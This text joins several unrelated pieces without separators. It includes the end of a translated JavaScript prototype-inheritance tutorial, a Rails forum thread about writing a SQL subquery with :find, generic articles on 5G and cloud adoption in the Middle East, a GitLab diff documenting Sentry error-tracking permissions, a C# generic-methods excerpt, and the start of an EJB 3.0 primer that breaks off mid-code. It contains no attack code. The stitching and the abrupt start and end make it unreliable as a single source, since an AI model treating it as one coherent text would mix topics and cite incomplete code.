     * p1:'Jack',20; __proto__:{__proto__:18,['Shenzhen','Shanghai']}
     * p2:'Mark';    __proto__:{__proto__:18,['Shenzhen','Shanghai']}
     */

    p1.home = ['Hangzhou', 'Guangzhou'];
    /* Really the same operation as p1.age = 20. Think: var o = {}; o.home = ['big','house'].
     * p1:'Jack',20,['Hangzhou','Guangzhou']; __proto__:{__proto__:18,['Shenzhen','Shanghai']}
     * p2:'Mark';                             __proto__:{__proto__:18,['Shenzhen','Shanghai']}
     */

    delete p1.age;
    /* Once the instance property is deleted, the previously shadowed prototype value shows
     * through again: shave your head and the adorable inherited curls grow back out.
     * That is the upward search mechanism: you are searched first, then your mom, then her
     * mom, which is why changes to your mom affect you dynamically.
     * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{__proto__:18,['Shenzhen','Shanghai']}
     * p2:'Mark';                          __proto__:{__proto__:18,['Shenzhen','Shanghai']}
     */

    Person.prototype.lastName = 'Jin';
    /* Modify the prototype and it is reflected dynamically in the instances: mom goes
     * trendy, and the neighbors mention it whenever you come up.
     * Note: this modifies Person's prototype, i.e. adds a lastName property to the Mother
     * instance serving as Person.prototype, not to Mother.prototype itself. Touching
     * different levels of the chain often gives very different results.
     * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'Jin',__proto__:18,['Shenzhen','Shanghai']}
     * p2:'Mark';                          __proto__:{'Jin',__proto__:18,['Shenzhen','Shanghai']}
     */

    Person.prototype = {
        age: 28,
        address: { country: 'USA', city: 'Washington' }
    };
    var p3 = new Person('Obama');
    /* Rewriting the prototype! Person.prototype is now an entirely new object: Person has
     * swapped moms, call her the stepmom.
     * Think of it as: var a=10; b=a; a=20; c=a. b keeps the old value and c takes the new
     * one, so p3 follows the stepmom while p1 and p2 stay with the birth mom.
     * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'Jin',__proto__:18,['Shenzhen','Shanghai']}
     * p2:'Mark';                          __proto__:{'Jin',__proto__:18,['Shenzhen','Shanghai']}
     * p3:'Obama';__proto__: 28 {country: 'USA', city: 'Washington'}
     */

    Mother.prototype.no = 9527;
    /* Modify the prototype's prototype and it is reflected in the instances: grandma goes
     * trendy and the neighbors say your granny is so hip.
     * Note: this modifies Mother.prototype, so p1 and p2 change, but p3 has already cut
     * ties with the birth mom and is unaffected.
     * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'Jin',__proto__:18,['Shenzhen','Shanghai'],9527}
     * p2:'Mark';                          __proto__:{'Jin',__proto__:18,['Shenzhen','Shanghai'],9527}
     * p3:'Obama';__proto__: 28 {country: 'USA', city: 'Washington'}
     */

    Mother.prototype = {
        car: 2,
        hobby: ['run','walk']
    };
    var p4 = new Person('Tony');
    /* Rewriting the prototype's prototype! Mother.prototype is now a brand-new object: the
     * human mom got a step-grandma! Since Person and Mother were already disconnected
     * above, however Mother changes no longer affects Person.
     * p4:'Tony';__proto__: 28 {country: 'USA', city: 'Washington'}
     */

    Person.prototype = new Mother(); // re-bind
    var p5 = new Person('Luffy');
    // To actually pick up those changes, Person's prototype must be bound to Mother again.
    // p5:'Luffy';__proto__:{__proto__: 2, ['run','walk']}

    p1.__proto__.__proto__.__proto__.__proto__ // null. See, the chain really does end at null.
    Mother.__proto__.__proto__.__proto__       // null. See, the chain really does end at null.

Make sense so far? Now let's talk about the difference between p1.age = 20, p1.home = ['Hangzhou', 'Guangzhou'], and p1.home[0] = 'Shenzhen'. Note that p1.home[0] = 'Shenzhen' has the shape of p1.object.property (or p1.object.method).

p1.age = 20 and p1.home = ['Hangzhou', 'Guangzhou'] are fairly easy to understand. Forget prototypes for a moment and recall how we add properties to an ordinary object:

    var obj = new Object();
    obj.name = 'xxx';
    obj.num = [100, 200];

See? Exactly the same thing.

So why doesn't p1.home[0] = 'Shenzhen' create a home array property on p1 and set its first element to 'Shenzhen'? Again, forget prototypes and consider the plain object above. If you wrote var obj.name = 'xxx', obj.num = [100, 200], would you get what you want? Obviously not: you would get nothing but an error, because obj has not been defined, so how could you put anything into it? Likewise, home in p1.home[0] is not defined on p1, so you cannot define home[0] there in one step. To create a home array on p1 you would of course write:

    p1.home = [];
    p1.home[0] = 'Shenzhen';

which is just the way we always do it.

The reason p1.home[0] = 'Shenzhen' does not throw an error is the prototype chain's search mechanism. When we evaluate p1.something, the search first looks at the instance for a matching value; failing that, it looks at the prototype, then the prototype's prototype, all the way to the top of the chain. If it reaches null without a hit, it returns undefined. Evaluating p1.home[0] uses the same search: p1 is checked first for a property or method named home, then each level up. We finally find home on Mother's prototype, so modifying it amounts to modifying Mother's prototype.

In one sentence: p1.home[0] = 'Shenzhen' is equivalent to Mother.prototype.home[0] = 'Shenzhen'.

As the analysis above shows, the central problem with prototype-chain inheritance is property sharing. Often we only want to share methods and not properties; ideally, each instance gets independent properties. Hence the two refinements of prototype inheritance below.

1) Combination inheritance

    function Mother (age) {
        this.age = age;
        this.hobby = ['running','football']
    }
    Mother.prototype.showAge = function () {
        console.log(this.age);
    };

    function Person (name, age) {
        Mother.call(this, age);  // second execution
        this.name = name;
    }
    Person.prototype = new Mother();  // first execution
    Person.prototype.constructor = Person;
    Person.prototype.showName = function () {
        console.log(this.name);
    }

    var p1 = new Person('Jack', 20);
    p1.hobby.push('basketball');  // p1:'Jack'; __proto__:20,['running','football']
    var p2 = new Person('Mark', 18);  // p2:'Mark'; __proto__:18,['running','football']

The result (devtools screenshots omitted): the first execution yields Person.prototype.age = undefined and Person.prototype.hobby = ['running','football']; the second execution, that is var p1 = new Person('Jack', 20), yields p1.age = 20 and p1.hobby = ['running','football'], which after the push becomes p1.hobby = ['running','football','basketball']. Keep track of what this refers to at each call and the result is easy to work out: just substitute this mentally. If it still feels convoluted, throw the concepts out of your head, pretend you are the browser, and execute the code from top to bottom; the answer falls out on its own.

By executing the prototype's constructor Mother() that second time, we copy a fresh set of the prototype's properties onto the object instance, achieving separation from the prototype's properties. The attentive reader will notice that the first call to Mother() seems to accomplish nothing. Can we skip it? We can, and that gives us the parasitic combination inheritance below.

2) Parasitic combination inheritance

    function object(o){
        function F(){}
        F.prototype = o;
        return new F();
    }

    function inheritPrototype(Person, Mother){
        var prototype = object(Mother.prototype);
        prototype.constructor = Person;
        Person.prototype = prototype;
    }

    function Mother (age) {
        this.age = age;
        this.hobby = ['running','football']
    }
    Mother.prototype.showAge = function () {
        console.log(this.age);
    };

    function Person (name, age) {
        Mother.call(this, age);
        this.name = name;
    }

    inheritPrototype(Person, Mother);

    Person.prototype.showName = function () {
        console.log(this.name);
    }

    var p1 = new Person('Jack', 20);
    p1.hobby.push('basketball');  // p1:'Jack'; __proto__:20,['running','football']
    var p2 = new Person('Mark', 18);  // p2:'Mark'; __proto__:18,['running','football']

The result (devtools screenshots omitted): the prototype no longer carries age and hobby properties, only the two methods. Exactly what we wanted!

The key is inside object(o): it borrows a throwaway constructor to neatly avoid calling new Mother(), then returns a new object instance whose prototype is o, completing the prototype-chain wiring. Convoluted, right? That is because we cannot simply set Person.prototype = Mother.prototype. (There is also a short P.S. on Object.create at the end of this post.)

Summary

After all that, there is really only one core idea: controlling what is shared and what is independent. When your object instances need independent properties, every technique ultimately boils down to creating those properties on the instance itself. If you don't want to overthink it, you can simply define the properties you need directly in Person to shadow the prototype's. In short, when you use prototype inheritance, treat prototype properties with special care, because each one is shared by every instance.

Below is a quick list of the ways to create objects in JS. The most commonly used today is the combination pattern; readers who know all this already can skip straight to the end and leave a like.

1) Primitive pattern

    // 1. Primitive pattern: object literal
    var person = {
        name: 'Jack',
        age: 18,
        sayName: function () { alert(this.name); }
    };
    // 1. Primitive pattern: Object constructor
    var person = new Object();
    person.name = 'Jack';
    person.age = 18;
    person.sayName = function () {
        alert(this.name);
    };

Obviously, when we want to create person1, person2, ... in batches, we retype a lot of code each time; even a seasoned copy-paster can't take it. Hence the factory pattern, for mass production.

2) Factory pattern

    // 2. Factory pattern: define a function that creates objects
    function creatPerson (name, age) {
        var person = new Object();
        person.name = name;
        person.age = age;
        person.sayName = function () {
            alert(this.name);
        };
        return person;
    }

The factory pattern is mass production: one simple call and you are in baby-making mode. Specify a name and age and out come piles of babies, hands free. But because the factory works off the books, you cannot tell what type an object is, human or dog (instanceof only reports Object), and each call creates its own separate temp object: bloated code. Ouch.

3) Constructor pattern

    // 3. Constructor pattern: define a constructor function for the object
    function Person (name, age) {
        this.name = name;
        this.age = age;
        this.sayName = function () {
            alert(this.name);
        };
    }
    var p1 = new Person('Jack', 18); // creates a p1 object
    Person('Jack', 18); // everything goes to window: window.name='Jack', window.sayName() alerts 'Jack'

The constructor resembles a class constructor in C++ or Java and is easy to understand; moreover, Person can serve for type identification (instanceof tests true for Person and Object). But every instance is still independent: the same-named methods on different instances are in fact different functions. Forget the word "function" for a second and treat sayName as an object: Zhang San's sayName and Li Si's sayName are separate things, while what we clearly want is to share a single sayName and save memory.

4) Prototype pattern

    // 4. Prototype pattern: assign prototype properties directly
    function Person () {}
    Person.prototype.name = 'Jack';
    Person.prototype.age = 18;
    Person.prototype.sayName = function () { alert(this.name); };

    // 4. Prototype pattern: literal form
    function Person () {}
    Person.prototype = {
        name: 'Jack',
        age: 18,
        sayName: function () { alert(this.name); }
    };
    var p1 = new Person(); // name='Jack'
    var p2 = new Person(); // name='Jack'

What needs attention here is the sharing of prototype properties and methods: every instance merely references what is on the prototype, and a change made anywhere ripples into every other instance.

5) Combination pattern (constructor + prototype)

    // 5. Combination (constructor + prototype) pattern
    function Person (name, age) {
        this.name = name;
        this.age = age;
    }
    Person.prototype = {
        hobby: ['running','football'],
        sayName: function () { alert(this.name); },
        sayAge: function () { alert(this.age); }
    };
    var p1 = new Person('Jack', 20);
    // p1:'Jack',20; __proto__: ['running','football'],sayName,sayAge
    var p2 = new Person('Mark', 18);
    // p2:'Mark',18; __proto__: ['running','football'],sayName,sayAge

The approach: put the properties and methods that must be independent into the constructor, and put the shareable parts on the prototype. This saves the most memory while preserving the independence of each object instance.

And a nice picture to wind down; typing all this wasn't easy, so leave a like on your way out!

Next up: closures. See you then.

(Image credit: 小周; please credit when reposting.)
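P.S. The object(o) helper above is doing the same job as the standard Object.create (available in ES5+ engines), so on modern engines inheritPrototype can skip the throwaway constructor. A minimal sketch, assuming an ES5 environment:

    function inheritPrototype(child, parent) {
        var proto = Object.create(parent.prototype); // same effect as object(parent.prototype)
        proto.constructor = child;
        child.prototype = proto;
    }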
Need translation of sql query to :find equivalent

#1

I have this query, and I have tried a few permutations to translate it into a :find equivalent; as a newbie this is a bit trickier than I first envisaged. Here's the core SQL:

    select resulttype from results
    where id in (
      select result_id from outcomes o1
      where o1.outcome_date = (select max(o2.outcome_date) from outcomes o2
                               where o2.testcase_id = o1.testcase_id
                                 and o1.testcase_id = '1'));

Can you give me a few pointers? Does it require a join clause from the results table to the outcomes, or can Rails do this easier?

#2

Brad S. wrote:

Try

    @result = Result.find(:all,
      :conditions => ["id in (select result_id from outcomes o1
                       where o1.outcome_date = (select max(o2.outcome_date) from outcomes o2
                       where o2.testcase_id = o1.testcase_id and o1.testcase_id = '1'))"])

This should work; I am doing something similar, only I am saying 'NOT IN'.

#3

I cannot get the brackets right: you seem to have more brackets on the ( than on the ), and when I mess around with this it just throws all kinds of errors.

Here is another query I am trying to write using :find

    Result.find(:all, :conditions =>
      "resulttype = (select resulttype from results where id = 1)")

When I run this with debug

    <%= debug Result.find(:all, :conditions =>
          "resulttype = (select resulttype from results where id = 1)") %>

I get:

    resulttype = 'pass'
    id = '1'

but when I remove debug, I just get ####. Adding an h, like this

    <%= h Result.find(:all, :conditions =>
          "resulttype = (select resulttype from results where id = 1)") %>

I get #<Result:0x395f080>. Can anyone point me to a good source to understand more about :find, because it's quite obscure in the Rails reference.

#4

On 6 Oct 2008, at 16:41, Brad S. wrote:

> <%= h Result.find(:all, :conditions =>
>       "resulttype = (select resulttype from results where id = 1)") %>
> I get #<Result:0x395f080>

<%= %> just calls to_s on the result inside it. The to_s on an array is just the concatenation of the results of to_s on the elements of the array, and the default to_s on an AR object is unhelpful. It's up to you to do something like

    <% @some_results.each do |result| %>
      date: <%= result.created_at %>
      value: <%= result.value %>
    <% end %>
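For completeness, a sketch of the :joins route asked about in #1 (untested; it assumes the outcomes table carries a result_id foreign key, as in the SQL above, and uses the old-style finder options of that Rails era):

    Result.find(:all,
      :select     => 'results.resulttype',
      :joins      => 'INNER JOIN outcomes o1 ON o1.result_id = results.id',
      :conditions => ['o1.testcase_id = ? AND o1.outcome_date = ' +
                      '(SELECT MAX(o2.outcome_date) FROM outcomes o2 ' +
                      'WHERE o2.testcase_id = o1.testcase_id)', 1])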
Connecting the Unconnected: Bridging the Digital Divide with 5G in the Middle East

Bridging the digital divide is a significant challenge for many regions, including the Middle East. The deployment of 5G technology presents a unique opportunity to address this divide and connect underserved and remote communities to the digital world. By leveraging 5G's capabilities, Middle Eastern countries can work towards ensuring that all citizens have access to the benefits of the digital age. Here are some ways in which 5G can contribute to connecting the unconnected in the Middle East:

1. Expanding Coverage: 5G networks can reach areas where traditional wired infrastructure is not economically viable. By strategically deploying 5G base stations, Middle Eastern countries can expand network coverage to remote and underserved regions.

2. Affordability and Accessibility: To bridge the digital divide, it's essential to make 5G services affordable and accessible to all. Middle Eastern governments and telecom providers can work together to offer cost-effective plans and devices that cater to diverse socioeconomic backgrounds.

3. Mobile Internet Access: 5G's mobile broadband capabilities offer an opportunity to provide high-speed internet access to communities without fixed-line connectivity, enabling them to access online resources and participate in the digital economy.

4. E-Learning Opportunities: With 5G connectivity, students in remote areas can access e-learning platforms, educational resources, and virtual classrooms, improving access to quality education.

5. Telemedicine and Healthcare: 5G enables telemedicine services, allowing healthcare professionals to remotely diagnose and treat patients in underserved areas, thereby improving healthcare access and outcomes.

6. Agricultural Connectivity: 5G can facilitate the deployment of IoT solutions in agriculture, enabling precision farming and providing farmers with real-time data and insights to enhance productivity and sustainability.

7. Emergency Services: 5G's low latency and high reliability are crucial for emergency response services in remote regions, ensuring prompt and efficient disaster management and support.

8. E-Government Services: 5G can support e-governance initiatives, making government services accessible to citizens in remote areas, improving efficiency, and promoting citizen engagement.

9. Entrepreneurship and Small Businesses: Access to 5G connectivity can empower entrepreneurs and small businesses in underserved areas, enabling them to reach larger markets and leverage digital tools for growth.

10. Digital Inclusion Programs: Governments and private organizations can collaborate on digital inclusion programs that provide training and resources to help communities leverage 5G technology effectively.

11. Smart Community Initiatives: 5G can support smart community initiatives, such as smart grids and intelligent transportation systems, enhancing the quality of life in underserved areas.

12. Public-Private Partnerships: Collaboration between governments, telecom operators, and other stakeholders is essential to drive initiatives that bridge the digital divide using 5G technology.

By focusing on these approaches and emphasizing the importance of digital inclusion, Middle Eastern countries can harness the power of 5G to connect the unconnected, empowering communities and driving socioeconomic development across the region.
Cloud Adoption in the Middle East: Trends and Transformations

Cloud adoption in the Middle East has been steadily growing over the years, and it has undergone significant transformations, driven by several trends and factors that have shaped the region's digital landscape. Here are some key trends and transformations related to cloud adoption in the Middle East:

1. Digital Transformation: Middle Eastern organizations, both public and private, have been increasingly adopting cloud technologies as part of their digital transformation journeys. Cloud computing enables them to modernize IT infrastructure, improve efficiency, and enhance customer experiences.

2. Government Initiatives: Several Middle Eastern governments have launched initiatives to promote cloud adoption across various sectors. These initiatives encourage public institutions and businesses to leverage cloud technologies for better service delivery and economic growth.

3. Increased Data Center Investments: With the rise in cloud adoption, there has been a corresponding increase in data center investments in the region. Data centers play a critical role in supporting cloud services and ensuring data sovereignty.

4. Growth of Cloud Service Providers: Major global cloud service providers have expanded their presence in the Middle East, establishing data centers and offering localized cloud services. This has facilitated cloud adoption by providing reliable and secure cloud solutions to local businesses.

5. Hybrid Cloud Solutions: Many organizations in the Middle East are adopting hybrid cloud solutions, combining public cloud services with private cloud or on-premises infrastructure. This approach allows businesses to balance security, compliance, and cost-effectiveness.

6. Industry-Specific Solutions: Cloud adoption in the Middle East is also driven by industry-specific solutions. For example, cloud technologies are increasingly being used in healthcare, finance, education, and logistics to address sector-specific challenges.

7. Startups and SMEs Embracing Cloud: Cloud computing has enabled startups and small and medium-sized enterprises (SMEs) to access affordable and scalable IT resources, leveling the playing field and fostering innovation.

8. Focus on Security and Compliance: As cloud adoption grows, there is a heightened focus on cybersecurity and data protection. Middle Eastern businesses are prioritizing security measures and seeking cloud providers that comply with local regulations.

9. Edge Computing Advancements: Edge computing, which brings cloud resources closer to end-users, is gaining traction in the Middle East. It enables low-latency services, critical for applications like IoT, autonomous vehicles, and real-time analytics.

10. Cloud Skills Development: There is an increasing demand for cloud-related skills in the job market. As cloud adoption expands, organizations are investing in cloud training and certifications for their IT teams.

11. Remote Workforce Enablement: Cloud technologies have played a crucial role in enabling remote work during the COVID-19 pandemic. Organizations rapidly adopted cloud-based collaboration and productivity tools to support remote workforce requirements.

12. Focus on Sustainability: Cloud providers and data center operators in the Middle East are increasingly emphasizing sustainability by adopting green energy practices and optimizing energy efficiency.
Overall, cloud adoption in the Middle East is expected to continue its upward trajectory, driven by advancements in technology, government support, industry-specific use cases, and a growing awareness of the benefits of cloud computing. As organizations continue to embrace cloud technologies, the region is likely to witness further transformations in business models, service delivery, and customer experiences.

Sustainable Smart Cities: 5G's Role in Building Eco-Friendly Urban Centers in the Middle East

5G technology plays a crucial role in building sustainable smart cities in the Middle East, where the need for efficient resource management and environmental conservation is significant. By integrating 5G connectivity with smart city initiatives, Middle Eastern countries are creating eco-friendly urban centers that promote sustainable development and enhance the quality of life for residents. Here are some ways 5G contributes to building sustainable smart cities in the Middle East:

1. IoT-Driven Sustainability: 5G's low latency and high capacity enable the seamless connection of a vast number of Internet of Things (IoT) devices. These devices can monitor energy usage, waste management, water consumption, air quality, and traffic flow in real-time, allowing cities to optimize resource utilization and reduce waste.

2. Energy Efficiency: 5G-powered smart grids enable precise monitoring and control of energy consumption. Cities can manage energy distribution more efficiently, integrate renewable energy sources, and reduce carbon emissions.

3. Smart Transportation: 5G facilitates intelligent transportation systems, enabling real-time traffic management and smart parking solutions. This leads to reduced congestion, lower fuel consumption, and improved air quality.

4. Waste Management: 5G-connected smart waste bins can optimize waste collection routes, minimizing unnecessary trips and reducing greenhouse gas emissions.

5. Water Management: 5G-based sensors and data analytics help in monitoring water distribution and consumption patterns, enabling more efficient water management and conservation efforts.

6. Environmental Monitoring: 5G networks support real-time environmental monitoring of air quality, temperature, humidity, and pollution levels. This data can inform policies and interventions to mitigate environmental challenges.

7. Smart Buildings: 5G-powered smart buildings can optimize energy usage, adjust lighting and temperature based on occupancy, and improve overall energy efficiency.

8. Public Services and Safety: 5G enhances public safety through real-time monitoring of critical infrastructure, efficient emergency response systems, and improved disaster management.

9. Smart Agriculture: In urban farming and vertical agriculture initiatives, 5G supports real-time monitoring and automation of agricultural processes, conserving resources and reducing food waste.

10. Citizen Engagement: 5G enables interactive citizen engagement platforms, allowing residents to actively participate in sustainability initiatives and provide valuable feedback to city authorities.

11. E-Governance and Digital Services: 5G-powered e-governance initiatives streamline government services, reducing paperwork, energy consumption, and resource usage.

12. Tourism and Green Tourism: 5G-driven smart tourism initiatives promote eco-friendly practices among tourists and support sustainable tourism development.
By leveraging 5G's capabilities, Middle Eastern cities can optimize resource management, reduce environmental impact, and foster innovation in sustainability. These efforts contribute to creating urban centers that are more resilient, energy-efficient, and environmentally conscious, making the Middle East a leader in building sustainable smart cities.

Tourism Transformed: Enhancing the Visitor Experience in the Middle East with 5G

The deployment of 5G technology in the Middle East is transforming the tourism industry and enhancing the visitor experience in the region. With its high-speed data transmission and low latency, 5G is unlocking new possibilities for tourists, enabling immersive and connected experiences that were not possible before. Here are some ways 5G is enhancing the visitor experience in the Middle East:

1. Seamless Connectivity: 5G provides tourists with seamless and reliable connectivity throughout their journeys, allowing them to stay connected, access maps, and share their experiences in real-time.

2. Augmented Reality (AR) and Virtual Reality (VR) Tourism Guides: Tourists can use AR and VR apps powered by 5G to explore historical sites, museums, and cultural landmarks with interactive and immersive guides.

3. Enhanced Navigation: 5G enables faster and more accurate GPS navigation, helping tourists navigate through unfamiliar cities and access location-based services.

4. Multimedia Content: Tourists can access high-quality multimedia content, such as 360-degree videos and augmented reality displays, to enrich their tourism experiences.

5. Real-Time Translation: 5G-powered translation services enable real-time language translation, breaking down language barriers and facilitating communication between tourists and locals.

6. Mobile Ticketing and Payments: 5G facilitates fast and secure mobile ticketing and digital payments for tourist attractions, public transportation, and restaurants, offering convenience and contactless experiences.

7. Virtual Tours: 5G enables virtual tours of popular attractions and historical sites, allowing tourists to explore and learn about destinations before their visits.

8. Interactive Exhibits: Museums and cultural institutions can create interactive exhibits and virtual reality experiences that engage and educate visitors using 5G technology.

9. Personalized Experiences: 5G-powered data analytics can help businesses offer personalized recommendations and tailored experiences based on tourists' preferences and behaviors.

10. Smart Hotels: Hotels can leverage 5G to offer smart room experiences, such as IoT-powered devices, smart assistants, and personalized services for guests.

11. Live Streaming Events: 5G's high bandwidth supports live streaming of events, festivals, and cultural performances, allowing tourists to virtually participate in local celebrations.

12. Tourist Safety and Security: 5G enables improved surveillance and monitoring, enhancing tourist safety and security in public spaces and crowded areas.

Middle Eastern countries are actively embracing 5G to leverage its potential in transforming the tourism industry. By providing tourists with enhanced connectivity, immersive experiences, and personalized services, 5G is elevating the visitor experience in the region and positioning the Middle East as a technologically advanced and attractive tourism destination on the global stage.
Commit 4a300961 authored by Achilleas Pipinellis, committed by GitLab Release Tools Bot

Merge branch 'improve-error-tracking-docs' into 'master'

Update docs with permissions required for error tracking

See merge request gitlab-org/gitlab-ce!25208 (cherry picked from commit 1e5c83f2)

4202f259 Update docs with permissions for error tracking
df00f7c5 Add line to doc listing reqd Sentry token scopes
6d40af7c Apply suggestion to doc/user/project/operations/error_tracking.md
68d92af4 Apply suggestion to doc/user/project/operations/error_tracking.md
192e3ed4 Apply suggestion to doc/user/project/operations/error_tracking.md
d7e03aff Add Manage Error Tracking permission to table

parent 22e1c70f

doc/user/permissions.md:

@@ -61,6 +61,7 @@ The following table depicts the various user permission levels in a project.
 | Manage related issues **[STARTER]** | | ✓ | ✓ | ✓ | ✓ |
 | Lock issue discussions | | ✓ | ✓ | ✓ | ✓ |
 | Create issue from vulnerability **[ULTIMATE]** | | ✓ | ✓ | ✓ | ✓ |
+| View Error Tracking list | | ✓ | ✓ | ✓ | ✓ |
 | Lock merge request discussions | | | ✓ | ✓ | ✓ |
 | Create new environments | | | ✓ | ✓ | ✓ |
 | Stop environments | | | ✓ | ✓ | ✓ |
@@ -101,6 +102,7 @@
 | Manage clusters | | | | ✓ | ✓ |
 | Manage license policy **[ULTIMATE]** | | | | ✓ | ✓ |
 | Edit comments (posted by any user) | | | | ✓ | ✓ |
+| Manage Error Tracking | | | | ✓ | ✓ |
 | Switch visibility level | | | | | ✓ |
 | Transfer project to another namespace | | | | | ✓ |
 | Remove project | | | | | ✓ |

doc/user/project/operations/error_tracking.md:

@@ -14,10 +14,14 @@
 You may sign up to the cloud hosted <https://sentry.io> or deploy your own on-premise instance.

 ### Enabling Sentry

+NOTE: **Note:**
+You will need at least Maintainer [permissions](../../permissions.md) to enable the Sentry integration.
+
 GitLab provides an easy way to connect Sentry to your project:

 1. Sign up to Sentry.io or [deploy your own](#deploying-sentry) Sentry instance.
+1. [Find or generate](https://docs.sentry.io/api/auth/) a Sentry auth token for your Sentry project.
+   Make sure to give the token at least the following scopes: `event:read` and `project:read`.
 1. Navigate to your project’s **Settings > Operations** and provide the Sentry API URL and auth token.
 1. Ensure that the 'Active' checkbox is set.
 1. Click **Save changes** for the changes to take effect.

@@ -25,6 +29,9 @@
 ## Error Tracking List

+NOTE: **Note:**
+You will need at least Reporter [permissions](../../permissions.md) to view the Error Tracking list.
+
 The Error Tracking list may be found at **Operations > Error Tracking** in your project's sidebar.

 ![Error Tracking list](img/error_tracking_list.png)
Omitting Type Parameters

When calling generic methods such as Swap<T>, you have the option of not specifying the type parameter, but only when the generic method requires arguments, because the compiler can then infer the type from the supplied parameters. For example, two System.Boolean values can be swapped like this:

    // The compiler will infer System.Boolean.
    bool b1 = true, b2 = false;
    Console.WriteLine("Before swap: {0}, {1}", b1, b2);
    Swap(ref b1, ref b2);
    Console.WriteLine("After swap: {0}, {1}", b1, b2);

But if, for example, you have a generic method named DisplayBaseClass<T> that takes no input parameters, as shown below:

    static void DisplayBaseClass<T>() {
        Console.WriteLine("The base class of {0} is: {1}.",
            typeof(T), typeof(T).BaseType);
    }

then you must specify the type parameter when calling this method:

    static void Main(string[] args) {
        // If the method has no parameters,
        // the type parameter must be specified.
        DisplayBaseClass<int>();
        DisplayBaseClass<string>();

        // Compilation error!
        // No parameters? Then there must be a placeholder!
        DisplayBaseClass();
        ...
    }

Figure 10.1. Generic methods in action

In this case the generic methods Swap<T> and DisplayBaseClass<T> were defined within the application object (that is, within the type that defines the Main() method). If you prefer to define these members in a new class type (MyHelperClass), you must write the following:

    public class MyHelperClass {
        public static void Swap<T>(ref T a, ref T b) {
            Console.WriteLine("Swap() was passed {0}", typeof(T));
            T temp;
            temp = a;
            a = b;
            b = temp;
        }
        public static void DisplayBaseClass<T>() {
            Console.WriteLine("The base class of {0} is: {1}.", typeof(T), typeof(T).BaseType);
        }
    }

Note that the MyHelperClass type is not itself generic, but it defines two generic methods. Either way, now that the Swap<T> and DisplayBaseClass<T> methods live in the context of a new class type, calls to these members must be qualified with the type name:

    MyHelperClass.Swap<int>(ref a, ref b);

Finally, generic methods are not required to be static. If Swap<T> and DisplayBaseClass<T> were instance-level methods, you would simply create an instance of MyHelperClass and call them through an object variable:

    MyHelperClass c = new MyHelperClass();
    c.Swap<int>(ref a, ref b);
EJB3.0入门 (Getting Started with EJB 3.0)

Author: Lynn Munsinger. Translation: 草儿 (Cao'er). Date: August 29, 2007 (my birthday).
Original: http://www.oracle.com/technology/tech/java/newto/introejb.htm

The EJB 3.0 specification makes developing EJBs much easier than it used to be, which may tempt you to consider writing your first EJB. If that is the case, congratulations: you have successfully avoided many of the frustrations that earlier EJB developers went through, and you get to enjoy the convenience of EJB 3.0 development. Before you start, though, you will probably want to know what EJBs are and what they are used for. This article explains the basics of EJBs and how to use them in a J2EE application.

What is an EJB?

An Enterprise JavaBean (EJB) is a reusable, portable J2EE component. An EJB consists of methods that encapsulate business logic. For example, an EJB may contain business logic with a method that updates customer data in a database. Multiple remote and local clients can call that method. In addition, EJBs run inside a container, which lets developers focus on the business logic in the bean without having to deal with complicated and error-prone matters such as transaction support, security, and remote object access. EJBs are developed as POJOs, or plain old Java objects, and developers can use metadata annotations to define how the container should manage the beans.

EJB types

There are three main EJB types: session beans, entity beans, and message-driven beans. A session bean performs a clear, decoupled task, such as checking a customer's account history. An entity bean is a complex business entity that represents a business object existing in a database. A message-driven bean is used to receive asynchronous JMS messages. Let's look at these types in more detail.

Session beans

A session bean generally represents an action in a business process, such as "process an order". Session beans are divided into stateful and stateless, depending on whether they maintain conversational state.

Stateless session beans have no intermediate state. They do not keep track of information passed from one method call to another, so each call to a stateless business method is independent of the one before it; think of tax calculations or funds transfers. When the tax-calculation method is called, the tax amount is computed and returned to the caller, and there is no need to store internal state for future calls. Because they maintain no state, these beans are managed purely by the container. When a client requests a stateless bean instance, it may receive an instance out of a pool of stateless session bean instances maintained by the container. And because stateless session beans can be shared, the container can maintain a smaller number of instances to serve a large number of clients. Simply adding the @Stateless annotation to a bean specifies that the Java bean is deployed and managed as a stateless session bean.

A stateful session bean maintains session state that spans multiple method calls; an online shopping cart, for example. When a customer starts shopping online, the customer's details are fetched from the database. The same information is also accessible to the other methods that are invoked as the customer adds items to or removes items from the cart, and so on. But because that state is not retained when the session ends, the system crashes, or the network fails, stateful session beans are transient. When a client requests a stateful session bean instance, the client receives a session instance whose state is maintained for that client alone. Adding the @Remove annotation to a method tells the container that the stateful session bean instance should be removed when that method call completes (a sketch of such a bean follows the example below).

Session bean example

    import javax.ejb.Stateless;

    /**
     * A simple stateless session bean implementing the incrementValue()
     * method of the CalculateEJB interface.
     **/
    @Stateless(name="CalculateEJB")
    public class CalculateEJBBean implements CalculateEJB {
        int value = 0;
        public String incrementValue() {
            value++;
            return "value incremented by 1";
        }
    }
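The original article shows only the stateless case. As a complement, here is a minimal sketch of a stateful counterpart using @Remove; the Cart interface and its methods are illustrative assumptions, not part of the original article:

    import java.util.ArrayList;
    import java.util.List;
    import javax.ejb.Remove;
    import javax.ejb.Stateful;

    // Hypothetical business interface for the sketch.
    interface Cart {
        void addItem(String item);
        List<String> getItems();
        void checkout();
    }

    /**
     * A stateful session bean that keeps a per-client list of items
     * between method calls (conversational state).
     */
    @Stateful(name = "CartEJB")
    public class CartEJBBean implements Cart {
        private List<String> items = new ArrayList<String>();

        public void addItem(String item) {
            items.add(item);   // state survives across calls from the same client
        }

        public List<String> getItems() {
            return items;
        }

        @Remove   // the container discards this bean instance after the call completes
        public void checkout() {
            items.clear();
        }
    }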
Entity beans

An entity bean is an object that manages persistent data, potentially using several related Java objects, and it can be uniquely identified by a primary key. You specify that a class is an entity bean by including the @Entity annotation. An entity bean represents persistent data from a database, such as a record in a customer table or an employee record in an employee table. Entity beans can also be shared by multiple clients: an employee entity, for example, can be used by several clients computing an employee's total annual pay or updating the employee's address. Entity-bean object variables can be persisted; every variable in an entity bean that does not carry the @Transient annotation is considered for persistence. A major feature of EJB 3.0 is the ability to create entity beans that contain object/relational mappings using metadata annotations. For example, to specify that the entity bean's empId variable maps to the EMPNO attribute of the Employees table, annotate the table name with @Table(name="Employees") and the empId variable with @Column(name="EMPNO"), as in the example below. Another EJB 3.0 feature is that you can easily test entity beans during development, running an entity bean outside the container with the Oracle Application Server Entity Test Harness.

Entity bean example

    import javax.persistence.*;
    import java.util.ArrayList;
    import java.util.Collection;

    @Entity
    @Table(name = "EMPLOYEES")
